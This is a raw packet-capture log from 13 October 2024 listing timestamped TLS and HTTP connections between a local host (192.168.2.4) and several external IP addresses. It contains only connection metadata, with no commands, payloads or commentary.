                                                                                                                          Oct 13, 2024 18:20:45.390202999 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.390264034 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.390624046 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.390680075 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.390903950 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.390966892 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.394202948 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.394263029 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.394319057 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.394371986 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.406371117 CEST49766443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:45.415157080 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.415250063 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.415759087 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.415828943 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.441169024 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.441282034 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.441438913 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.441517115 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.441579103 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.441636086 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.477910042 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.477998972 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.478065014 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.478141069 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.478264093 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.478326082 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.478391886 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.478454113 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.478600025 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.478655100 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.478883982 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.478946924 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.479048967 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.479141951 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.479430914 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.479499102 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.479624033 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.479686975 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.479868889 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.479933023 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.479983091 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.480036974 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.504035950 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.504129887 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.504503012 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.504585981 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.530060053 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.530261993 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.530332088 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.530536890 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.530638933 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.530638933 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.530705929 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.530772924 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.563734055 CEST4434976691.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.563793898 CEST4434976691.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.563815117 CEST4434976691.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.563853025 CEST4434976691.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.564008951 CEST4434976691.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.564088106 CEST49766443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:45.564088106 CEST49766443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:45.564114094 CEST4434976691.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.564353943 CEST49766443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:45.565644026 CEST49766443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:45.566888094 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.567121029 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.567235947 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.567236900 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.567303896 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.567342997 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.567378044 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.567425966 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.567471981 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.567495108 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.567507029 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.567574978 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.567667007 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.567771912 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.567778111 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.567823887 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.568150043 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.568181992 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.637343884 CEST4434976691.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.637495995 CEST4434976691.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.637568951 CEST49766443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:45.638067007 CEST49766443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:45.638067007 CEST49766443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:45.667454004 CEST4434976218.66.102.15192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.668262005 CEST4434976218.66.102.15192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.668437004 CEST49762443192.168.2.418.66.102.15
                                                                                                                          Oct 13, 2024 18:20:45.676265955 CEST49762443192.168.2.418.66.102.15
                                                                                                                          Oct 13, 2024 18:20:45.676285982 CEST4434976218.66.102.15192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.689225912 CEST49769443192.168.2.418.66.102.66
                                                                                                                          Oct 13, 2024 18:20:45.689250946 CEST4434976918.66.102.66192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.689326048 CEST49769443192.168.2.418.66.102.66
                                                                                                                          Oct 13, 2024 18:20:45.689599991 CEST49769443192.168.2.418.66.102.66
                                                                                                                          Oct 13, 2024 18:20:45.689611912 CEST4434976918.66.102.66192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.692421913 CEST49770443192.168.2.491.228.74.166
                                                                                                                          Oct 13, 2024 18:20:45.692462921 CEST4434977091.228.74.166192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.692533016 CEST49770443192.168.2.491.228.74.166
                                                                                                                          Oct 13, 2024 18:20:45.692761898 CEST49770443192.168.2.491.228.74.166
                                                                                                                          Oct 13, 2024 18:20:45.692781925 CEST4434977091.228.74.166192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.952800989 CEST49766443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:45.952816963 CEST4434976691.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.327904940 CEST4434976918.66.102.66192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.328464031 CEST49769443192.168.2.418.66.102.66
                                                                                                                          Oct 13, 2024 18:20:46.328494072 CEST4434976918.66.102.66192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.329571009 CEST4434976918.66.102.66192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.329649925 CEST49769443192.168.2.418.66.102.66
                                                                                                                          Oct 13, 2024 18:20:46.330434084 CEST49769443192.168.2.418.66.102.66
                                                                                                                          Oct 13, 2024 18:20:46.330538988 CEST4434976918.66.102.66192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.331175089 CEST49769443192.168.2.418.66.102.66
                                                                                                                          Oct 13, 2024 18:20:46.331182003 CEST4434976918.66.102.66192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.373152971 CEST49769443192.168.2.418.66.102.66
                                                                                                                          Oct 13, 2024 18:20:46.513885021 CEST4434977091.228.74.166192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.515008926 CEST49770443192.168.2.491.228.74.166
                                                                                                                          Oct 13, 2024 18:20:46.515043974 CEST4434977091.228.74.166192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.518732071 CEST4434977091.228.74.166192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.518826962 CEST49770443192.168.2.491.228.74.166
                                                                                                                          Oct 13, 2024 18:20:46.520895958 CEST49770443192.168.2.491.228.74.166
                                                                                                                          Oct 13, 2024 18:20:46.521060944 CEST4434977091.228.74.166192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.521167994 CEST49770443192.168.2.491.228.74.166
                                                                                                                          Oct 13, 2024 18:20:46.521178007 CEST4434977091.228.74.166192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.561836958 CEST49770443192.168.2.491.228.74.166
                                                                                                                          Oct 13, 2024 18:20:46.627912045 CEST4434976918.66.102.66192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.628108025 CEST4434976918.66.102.66192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.628266096 CEST49769443192.168.2.418.66.102.66
                                                                                                                          Oct 13, 2024 18:20:46.629470110 CEST49769443192.168.2.418.66.102.66
                                                                                                                          Oct 13, 2024 18:20:46.629487038 CEST4434976918.66.102.66192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.708061934 CEST4434977091.228.74.166192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.708261967 CEST4434977091.228.74.166192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.708502054 CEST49770443192.168.2.491.228.74.166
                                                                                                                          Oct 13, 2024 18:20:46.737843037 CEST49770443192.168.2.491.228.74.166
                                                                                                                          Oct 13, 2024 18:20:46.737869024 CEST4434977091.228.74.166192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.759339094 CEST4973780192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:46.764287949 CEST80497373.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.770385027 CEST49771443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:46.770442009 CEST4434977191.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.770539999 CEST49771443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:46.770785093 CEST49771443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:46.770819902 CEST4434977191.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.930362940 CEST80497373.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.930418968 CEST80497373.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.930469990 CEST80497373.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.930502892 CEST80497373.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.930531979 CEST4973780192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:46.930613041 CEST4973780192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:47.803905964 CEST4434977191.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:47.804253101 CEST49771443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:47.804287910 CEST4434977191.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:47.807851076 CEST4434977191.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:47.807926893 CEST49771443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:47.808399916 CEST49771443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:47.808578014 CEST4434977191.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:47.808588982 CEST49771443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:47.851166964 CEST49771443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:47.851193905 CEST4434977191.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:47.903244019 CEST49771443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:47.998810053 CEST4434977191.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:47.998874903 CEST4434977191.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:47.998939991 CEST49771443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:47.999912977 CEST49771443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:47.999937057 CEST4434977191.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:52.902348995 CEST44349755172.217.16.196192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:52.902415037 CEST44349755172.217.16.196192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:52.902628899 CEST49755443192.168.2.4172.217.16.196
                                                                                                                          Oct 13, 2024 18:20:54.456780910 CEST4972380192.168.2.4199.232.210.172
                                                                                                                          Oct 13, 2024 18:20:54.462207079 CEST8049723199.232.210.172192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:54.462299109 CEST4972380192.168.2.4199.232.210.172
                                                                                                                          Oct 13, 2024 18:20:54.612708092 CEST49755443192.168.2.4172.217.16.196
                                                                                                                          Oct 13, 2024 18:20:54.612778902 CEST44349755172.217.16.196192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:26.619599104 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:21:26.619599104 CEST4973980192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:21:26.620085001 CEST4973580192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:21:26.625202894 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:26.625260115 CEST80497393.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:26.625291109 CEST80497353.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:26.635377884 CEST4973880192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:21:26.640660048 CEST80497383.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:26.650780916 CEST4974080192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:21:26.656111002 CEST80497403.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:26.916395903 CEST4974580192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:21:26.921821117 CEST80497453.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:31.489738941 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:31.489794016 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:31.489867926 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:31.490415096 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:31.490438938 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:31.937083006 CEST4973780192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:21:31.942208052 CEST80497373.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.161381960 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.161470890 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.163156033 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.163168907 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.163672924 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.174349070 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.219434023 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.276757956 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.276842117 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.276912928 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.276916027 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.276943922 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.276978970 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.277020931 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.364151001 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.364176035 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.364283085 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.364301920 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.364353895 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.368274927 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.368299961 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.368351936 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.368360043 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.368429899 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.452728033 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.452750921 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.452814102 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.452824116 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.452868938 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.454262018 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.454283953 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.454349041 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.454355001 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.454406023 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.456052065 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.456074953 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.456141949 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.456146002 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.456204891 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.457686901 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.457707882 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.457768917 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.457773924 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.457814932 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.541526079 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.541553020 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.541610003 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.541620970 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.541672945 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.541985035 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.542006016 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.542062998 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.542068005 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.542109013 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.542804003 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.542825937 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.542889118 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.542895079 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.542953968 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.543680906 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.543701887 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.543757915 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.543761969 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.543808937 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.544579983 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.544599056 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.544661045 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.544667959 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.544709921 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.545550108 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.545568943 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.545625925 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.545630932 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.545680046 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.546266079 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.546331882 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.546339035 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.546353102 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.546430111 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.546562910 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.546581030 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.546590090 CEST49779443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.546596050 CEST4434977913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.602628946 CEST49780443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.602669954 CEST4434978013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.603018045 CEST49780443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.606287003 CEST49781443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.606349945 CEST4434978113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.606439114 CEST49781443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.607017994 CEST49782443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.607029915 CEST4434978213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.607192993 CEST49782443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.610651016 CEST49783443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.610658884 CEST4434978313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.610753059 CEST49783443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.611011028 CEST49784443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.611108065 CEST4434978413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.611243010 CEST49784443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.611370087 CEST49783443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.611390114 CEST4434978313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.611449003 CEST49780443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.611459017 CEST4434978013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.611530066 CEST49784443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.611566067 CEST4434978413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.611818075 CEST49781443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.611834049 CEST4434978113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:32.611913919 CEST49782443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:32.611924887 CEST4434978213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:33.263484001 CEST4434978113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:33.264113903 CEST49781443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:33.264141083 CEST4434978113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:33.264600039 CEST49781443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:33.264606953 CEST4434978113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:33.265217066 CEST4434978313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:33.266350985 CEST49783443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:33.266379118 CEST4434978313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:33.266843081 CEST49783443192.168.2.413.107.246.60
